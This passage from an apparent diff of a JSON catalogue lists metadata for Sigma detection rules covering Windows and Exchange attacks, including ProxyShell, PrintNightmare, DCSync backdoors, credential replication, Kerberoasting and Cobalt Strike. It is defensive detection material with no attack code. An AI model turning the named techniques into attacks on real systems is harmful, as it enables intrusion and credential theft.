"https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2021/08/09", - "filename": "win_exchange_proxyshell_mailbox_export.yml", - "author": "Florian Roth, Rich Warren, Christian Burkard", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", - "uuid": "09570ae5-889e-43ea-aac0-0e1221fb3d95", - "value": "Remove Exported Mailbox from Exchange Webserver", - "meta": { - "refs": [ - "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ], - "creation_date": "2021/08/27", - "filename": "win_exchange_proxyshell_remove_mailbox_export.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", - "uuid": "9db37458-4df2-46a5-95ab-307e7f29e675", - "value": "Exchange Set OabVirtualDirectory ExternalUrl Property", - "meta": { - "refs": [ - "https://twitter.com/OTR_Community/status/1371053369071132675", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2021/03/15", - "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml", - "author": "Jose Rodriguez @Cyb3rPandaH", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the Installation of a Exchange Transport Agent", - "uuid": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", - "value": "MSExchange Transport Agent Installation - Builtin", - "meta": { - "refs": [ - "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.002" - ], - "creation_date": "2021/06/08", - "filename": "win_exchange_transportagent.yml", - "author": "Tobias Michalski", - "level": "medium", - "falsepositive": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a failed installation of a Exchange Transport Agent", - "uuid": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", - "value": "Failed MSExchange Transport Agent Installation", - "meta": { - "refs": [ - "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.002" - ], - "creation_date": "2021/06/08", - "filename": "win_exchange_transportagent_failed.yml", - "author": "Tobias Michalski", - "level": "high", - "falsepositive": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers", - "uuid": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b", - "value": "NTLM Logon", - "meta": { - "refs": [ - "https://twitter.com/JohnLaTwC/status/1004895028995477505", - "https://goo.gl/PsqrhT", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1550.002" - ], - "creation_date": "2018/06/08", - "filename": "win_susp_ntlm_auth.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "Legacy hosts" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects common NTLM brute force device names", - "uuid": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", - "value": "NTLM Brute Force", - "meta": { - "refs": [ - "https://www.varonis.com/blog/investigate-ntlm-brute-force", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_brute_force.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ], - "creation_date": "2022/02/02", - "filename": "win_susp_ntlm_brute_force.yml", - "author": "Jerry Shockley '@jsh0x'", - "level": "medium", - "falsepositive": [ - "Systems with names equal to the spoofed ones used by the brute force tools" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", - "uuid": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", - "value": "Potential Remote Desktop Connection to Non-Domain Host", - "meta": { - "refs": [ - "n/a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_rdp.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2020/05/22", - "filename": "win_susp_ntlm_rdp.yml", - "author": "James Pemberton", - "level": "medium", - "falsepositive": [ - "Host connections to valid domains, exclude these.", - "Host connections not using host FQDN.", - "Host connections to external legitimate domains." - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", - "uuid": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", - "value": "OpenSSH Server Listening On Socket", - "meta": { - "refs": [ - "https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH", - "https://winaero.com/enable-openssh-server-windows-10/", - "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse", - "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx", - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.004" - ], - "creation_date": "2022/10/25", - "filename": "win_sshd_openssh_server_listening_on_socket.yml", - "author": "mdecrevoisier", - "level": "medium", - "falsepositive": [ - "Legitimate administrator activity" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675", - "uuid": "4e64668a-4da1-49f5-a8df-9e2d5b866718", - "value": "Possible CVE-2021-1675 Print Spooler Exploitation", - "meta": { - "refs": [ - "https://github.com/hhlxf/PrintNightmare", - "https://github.com/afwu/PrintNightmare", - "https://twitter.com/fuzzyf10w/status/1410202370835898371", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675" - ], - "creation_date": "2021/06/30", - "filename": "win_exploit_cve_2021_1675_printspooler.yml", - "author": "Florian Roth, KevTheHermit, fuzzyf10w, Tim Shelton", - "level": "high", - "falsepositive": [ - "Problems with printer drivers" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", - "uuid": "f34d942d-c8c4-4f1f-b196-22471aecf10a", - "value": "CVE-2021-1675 Print Spooler Exploitation", - "meta": { - "refs": [ - "https://twitter.com/MalwareJake/status/1410421967463731200", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler_operational.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675" - ], - "creation_date": "2021/07/01", - "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", - "uuid": "ff151c33-45fa-475d-af4f-c2f93571f4fe", - "value": "Azure AD Health Monitoring Agent Registry Keys Access", - "meta": { - "refs": [ - "https://o365blog.com/post/hybridhealthagent/", - "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012" - ], - "creation_date": "2021/08/26", - "filename": "win_security_aadhealth_mon_agent_regkey_access.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", - "uuid": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", - "value": "Azure AD Health Service Agents Registry Keys Access", - "meta": { - "refs": [ - "https://o365blog.com/post/hybridhealthagent/", - "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012" - ], - "creation_date": "2021/08/26", - "filename": "win_security_aadhealth_svc_agent_regkey_access.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This rule tries to detect token impersonation and theft. (Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", - "uuid": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", - "value": "Access Token Abuse", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1134/001/", - "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation", - "https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_access_token_abuse.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1134.001" - ], - "creation_date": "2022/11/06", - "filename": "win_security_access_token_abuse.yml", - "author": "Michaela Adams, Zach Mathis", - "level": "medium", - "falsepositive": [ - "Anti-Virus" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", - "uuid": "2c99737c-585d-4431-b61a-c911d86ff32f", - "value": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", - "meta": { - "refs": [ - "https://twitter.com/menasec1/status/1111556090137903104", - "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2019/04/03", - "filename": "win_security_account_backdoor_dcsync_rights.yml", - "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", - "level": "high", - "falsepositive": [ - "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", - "uuid": "35ba1d85-724d-42a3-889f-2e2362bcaf23", - "value": "AD Privileged Users or Groups Reconnaissance", - "meta": { - "refs": [ - "https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.002" - ], - "creation_date": "2019/04/03", - "filename": "win_security_account_discovery.yml", - "author": "Samir Bousseaden", - "level": "high", - "falsepositive": [ - "If source account name is not an admin then its super suspicious" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects certificate creation with template allowing risk permission subject", - "uuid": "5ee3a654-372f-11ec-8d3d-0242ac130003", - "value": "ADCS Certificate Template Configuration Vulnerability", - "meta": { - "refs": [ - "https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.credential_access" - ], - "creation_date": "2021/11/17", - "filename": "win_security_adcs_certificate_template_configuration_vulnerability.yml", - "author": "Orlinum , BlueDefenZer", - "level": "low", - "falsepositive": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", - "uuid": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", - "value": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", - "meta": { - "refs": [ - "https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.credential_access" - ], - "creation_date": "2021/11/17", - "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml", - "author": "Orlinum , BlueDefenZer", - "level": "high", - "falsepositive": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.", - "uuid": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", - "value": "Add or Remove Computer from DC", - "meta": { - "refs": [ - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_add_remove_computer.yml" - ], - "tags": "No established tags", - "creation_date": "2022/10/14", - "filename": "win_security_add_remove_computer.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects logon with \"Special groups\" and \"Special Privileges\" can be thought of as Administrator groups or privileges.", - "uuid": "94309181-d345-4cbf-b5fe-061769bdf9cb", - "value": "User with Privileges Logon", - "meta": { - "refs": [ - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_logon.yml" - ], - "tags": "No established tags", - "creation_date": "2022/10/14", - "filename": "win_security_admin_logon.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detect remote login by Administrator user (depending on internal pattern).", - "uuid": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", - "value": "Admin User Remote Logon", - "meta": { - "refs": [ - "https://car.mitre.org/wiki/CAR-2016-04-005", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_rdp_login.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1078.001", - "attack.t1078.002", - "attack.t1078.003", - "car.2016-04-005" - ], - "creation_date": "2017/10/29", - "filename": "win_security_admin_rdp_login.yml", - "author": "juju4", - "level": "low", - "falsepositive": [ - "Legitimate administrative activity." - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects access to $ADMIN share", - "uuid": "098d7118-55bc-4912-a836-dc6483a8d150", - "value": "Access to ADMIN$ Share", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_share_access.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2017/03/04", - "filename": "win_security_admin_share_access.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects WRITE_DAC access to a domain object", - "uuid": "028c7842-4243-41cd-be6f-12f3cf1a26c7", - "value": "AD Object WriteDAC Access", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190101151110.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_object_writedac_access.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.001" - ], - "creation_date": "2019/09/12", - "filename": "win_security_ad_object_writedac_access.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", - "uuid": "17d619c1-e020-4347-957e-1d1207455c93", - "value": "Active Directory Replication from Non Machine Account", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_replication_non_machine_account.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.006" - ], - "creation_date": "2019/07/26", - "filename": "win_security_ad_replication_non_machine_account.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects access to a domain user from a non-machine account", - "uuid": "ab6bffca-beff-4baa-af11-6733f296d57a", - "value": "AD User Enumeration", - "meta": { - "refs": [ - "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", - "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", - "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.002" - ], - "creation_date": "2020/03/30", - "filename": "win_security_ad_user_enumeration.yml", - "author": "Maxime Thiebaut (@0xThiebaut)", - "level": "medium", - "falsepositive": [ - "Administrators configuring new users." - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", - "uuid": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", - "value": "Enabled User Right in AD to Control User Objects", - "meta": { - "refs": [ - "https://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_active_directory_user_control.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2017/07/30", - "filename": "win_security_alert_active_directory_user_control.yml", - "author": "@neu5ron", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", - "uuid": "300bac00-e041-4ee2-9c36-e262656a6ecc", - "value": "Active Directory User Backdoors", - "meta": { - "refs": [ - "https://msdn.microsoft.com/en-us/library/cc220234.aspx", - "https://adsecurity.org/?p=3466", - "https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml" - ], - "tags": [ - "attack.t1098", - "attack.persistence" - ], - "creation_date": "2017/04/13", - "filename": "win_security_alert_ad_user_backdoors.yml", - "author": "@neu5ron", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", - "uuid": "f6de9536-0441-4b3f-a646-f4e00f300ffd", - "value": "Weak Encryption Enabled and Kerberoast", - "meta": { - "refs": [ - "https://adsecurity.org/?p=2053", - "https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2017/07/30", - "filename": "win_security_alert_enable_weak_encryption.yml", - "author": "@neu5ron", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This events that are generated when using the hacktool Ruler by Sensepost", - "uuid": "24549159-ac1b-479c-8175-d42aea947cae", - "value": "Hacktool Ruler", - "meta": { - "refs": [ - "https://github.com/sensepost/ruler", - "https://github.com/sensepost/ruler/issues/47", - "https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml" - ], - "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1087", - "attack.t1114", - "attack.t1059", - "attack.t1550.002" - ], - "creation_date": "2017/05/31", - "filename": "win_security_alert_ruler.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Go utilities that use staaldraad awesome NTLM library" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", - "uuid": "c0580559-a6bd-4ef6-b9b7-83703d98b561", - "value": "Chafer Activity - Security", - "meta": { - "refs": [ - "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_chafer_mar18_security.yml" - ], - "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2018/03/23", - "filename": "win_security_apt_chafer_mar18_security.yml", - "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", - "uuid": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", - "value": "Defrag Deactivation - Security", - "meta": { - "refs": [ - "https://securelist.com/apt-slingshot/84312/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_slingshot.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053", - "attack.s0111" - ], - "creation_date": "2019/03/04", - "filename": "win_security_apt_slingshot.yml", - "author": "Florian Roth, Bartlomiej Czyz (@bczyz1)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects activity mentioned in Operation Wocao report", - "uuid": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", - "value": "Operation Wocao Activity - Security", - "meta": { - "refs": [ - "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", - "https://twitter.com/SBousseaden/status/1207671369963646976", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_wocao.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" - ], - "creation_date": "2019/12/20", - "filename": "win_security_apt_wocao.yml", - "author": "Florian Roth, frack113", - "level": "high", - "falsepositive": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", - "uuid": "f6de6525-4509-495a-8a82-1f8b0ed73a00", - "value": "Remote Task Creation via ATSVC Named Pipe", - "meta": { - "refs": [ - "https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_atsvc_task.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.persistence", - "car.2013-05-004", - "car.2015-04-001", - "attack.t1053.002" - ], - "creation_date": "2019/04/03", - "filename": "win_security_atsvc_task.yml", - "author": "Samir Bousseaden", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", - "uuid": "8cd538a4-62d5-4e83-810b-12d41e428d6e", - "value": "Processes Accessing the Microphone and Webcam", - "meta": { - "refs": [ - "https://twitter.com/duzvik/status/1269671601852813320", - "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_camera_microphone_access.yml" - ], - "tags": [ - "attack.collection", - "attack.t1123" - ], - "creation_date": "2020/06/07", - "filename": "win_security_camera_microphone_access.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "uuid": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", - "value": "CobaltStrike Service Installations - Security", - "meta": { - "refs": [ - "https://www.sans.org/webcasts/119395", - "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" - ], - "creation_date": "2021/05/26", - "filename": "win_security_cobaltstrike_service_installs.yml", - "author": "Florian Roth, Wojciech Lesicki", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", - "uuid": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", - "value": "DCERPC SMB Spoolss Named Pipe", - "meta": { - "refs": [ - "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", - "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", - "https://twitter.com/_dirkjan/status/1309214379003588608", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2018/11/28", - "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml", - "author": "OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Domain Controllers acting as printer servers too? :)" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", - "uuid": "c39f0c81-7348-4965-ab27-2fde35a1b641", - "value": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009183000.html", - 